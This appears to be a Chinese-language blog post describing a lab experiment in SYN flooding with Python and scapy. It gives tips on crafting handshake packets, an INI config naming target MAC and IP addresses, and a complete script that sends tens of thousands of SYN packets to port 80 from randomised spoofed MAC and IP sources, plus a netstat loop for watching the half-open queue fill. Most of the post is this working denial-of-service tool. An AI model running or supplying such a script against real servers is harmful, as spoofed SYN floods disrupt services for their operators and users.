Python实验SYN攻击

Zss 发表于:

使用Python来在二层网络中来模拟不同的源地址的端口来和服务器进行tcp的第一次握手,但是不回复第三次握手包

使得服务器半连接的队列中长时间占用大量tcp连接

在使用scapy来构造第一次握手包的时候需要主要的是校验位如果不是自己计算正确,那么不要填写,不然服务器是会丢弃掉这次握手

发现tcp的半连接队列最大为256个,暂时还不清楚为什么,这个应该是可以在哪个地方设置的

当开始发送数据包,服务器使用命令:while :;do sleep 1;netstat -nat|grep -E ‘tcp\s’|grep -E ‘SYN’;echo ——-;done

查看半连接数瞬间占满,但是此时服务器并不会down掉,还是能正常连接

配置文件:

[CONFIG]
network_iface=Intel(R) Ethernet Connection I219-V
#指定网卡发送填写网卡描述


eth_dst=8c:ec:4b:58:b8:96
#ETH的目的mac地址
eth_src=4c:cc:6a:34:4e:11
#ETH的源mac地址
eth_type=2048
#ETH的tpye类型


ip_version=4

ip_ihl=5

ip_tos=0

ip_len=40

ip_id=31036

ip_flags=DF

ip_frag=0

ip_ttl=128

ip_proto=tcp

ip_chksum=0

ip_src=10.6.161.169

ip_dst=10.6.161.252

ip_options=


tcp_sport=4565
tcp_dport=80
tcp_seq=931545279
tcp_ack=1282193866
tcp_dataofs=5
tcp_reserved=0
tcp_flags=S
tcp_window=1024
tcp_chksum=27592
tcp_urgptr=0
tcp_options=
#coding:gbk
from configparser import ConfigParser
from subprocess import PIPE,Popen
from threading import Thread
from scapy.all import *

class Configinfo():
    def __init__(self,config_file):
        readconfig = ConfigParser()
        readconfig.read(config_file)
        self.config = {}
        try:
            code = 'gbk'
            self.config['network_iface'] = readconfig.get('CONFIG', 'network_iface').encode(code)

            self.config['eth_dst'] = readconfig.get('CONFIG','eth_dst').encode(code)
            self.config['eth_src'] = readconfig.get('CONFIG', 'eth_src').encode(code)
            self.config['eth_type'] = readconfig.get('CONFIG','eth_type').encode(code)

            self.config['ip_version'] = int(readconfig.get('CONFIG', 'ip_version').encode(code))
            self.config['ip_ihl'] = int(readconfig.get('CONFIG', 'ip_ihl').encode(code))
            self.config['ip_tos'] = int(readconfig.get('CONFIG', 'ip_tos').encode(code))
            self.config['ip_len'] = int(readconfig.get('CONFIG', 'ip_len').encode(code))
            self.config['ip_id'] = int(readconfig.get('CONFIG', 'ip_id').encode(code))
            self.config['ip_flags'] = readconfig.get('CONFIG', 'ip_flags').encode(code)
            self.config['ip_frag'] = int(readconfig.get('CONFIG', 'ip_frag').encode(code))
            self.config['ip_ttl'] = int(readconfig.get('CONFIG', 'ip_ttl').encode(code))
            self.config['ip_proto'] = readconfig.get('CONFIG', 'ip_proto').encode(code)
            self.config['ip_chksum'] = int(readconfig.get('CONFIG', 'ip_chksum').encode(code))
            self.config['ip_src'] = readconfig.get('CONFIG', 'ip_src').encode(code)
            self.config['ip_dst'] = readconfig.get('CONFIG', 'ip_dst').encode(code)
            self.config['ip_options'] = readconfig.get('CONFIG', 'ip_options').encode(code)

            self.config['tcp_sport'] = int(readconfig.get('CONFIG', 'tcp_sport').encode(code))
            self.config['tcp_dport'] = int(readconfig.get('CONFIG', 'tcp_dport').encode(code))
            self.config['tcp_seq'] = int(readconfig.get('CONFIG', 'tcp_seq').encode(code))
            self.config['tcp_ack'] = int(readconfig.get('CONFIG', 'tcp_ack').encode(code))
            self.config['tcp_dataofs'] = int(readconfig.get('CONFIG', 'tcp_dataofs').encode(code))
            self.config['tcp_reserved'] = int(readconfig.get('CONFIG', 'tcp_reserved').encode(code))
            self.config['tcp_flags'] = readconfig.get('CONFIG', 'tcp_flags').encode(code)
            self.config['tcp_window'] = int(readconfig.get('CONFIG', 'tcp_window').encode(code))
            self.config['tcp_chksum'] = int(readconfig.get('CONFIG', 'tcp_chksum').encode(code))
            self.config['tcp_urgptr'] = int(readconfig.get('CONFIG', 'tcp_urgptr').encode(code))
            self.config['tcp_options'] = readconfig.get('CONFIG', 'tcp_options').encode(code)

        except Exception as e:
            print '读取发生错误:%s'%e
            exit()

def read_config(file_path):
    config = Configinfo(file_path)
    return config.config

if __name__ == '__main__':
    config = read_config('config.ini')
    str_list = ['a', 'b', 'c', 'd', 'e', 'f', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
    for  i in range(1,234):
        for t in range(1, 234):
            eth_src = random.choice(str_list) + random.choice(str_list) + ':' + random.choice(str_list) + random.choice(
                str_list) + ':' + random.choice(str_list) + random.choice(str_list) + ':' + random.choice(
                str_list) + random.choice(str_list) + ':' + random.choice(str_list) + random.choice(
                str_list) + ':' + random.choice(str_list) + random.choice(str_list)
            ip_src = '10.6.%d.%d'%(t,i)
            sport = random.randint(1000,60000)
            eth = Ether(dst=config['eth_dst'],src=eth_src,type=int(config['eth_type']))
            ip = IP(version=config['ip_version'],ihl=config['ip_ihl'],tos=config['ip_tos'],\
                    len=config['ip_len'],id=config['ip_id'],flags=config['ip_flags'],frag=config['ip_frag'],\
                    ttl=config['ip_ttl'],proto=config['ip_proto'],src=ip_src,\
                    dst=config['ip_dst'],options=config['ip_options'])
            tcp = TCP(sport=sport,dport=config['tcp_dport'],seq=config['tcp_seq'],ack=config['tcp_ack'],\
                      dataofs=config['tcp_dataofs'],reserved=config['tcp_reserved'],flags=config['tcp_flags'],\
                      window=config['tcp_window'],urgptr=config['tcp_urgptr'],options=config['tcp_options'])
            pack=eth/ip/tcp
            sendp(pack,iface=config['network_iface'],count=1)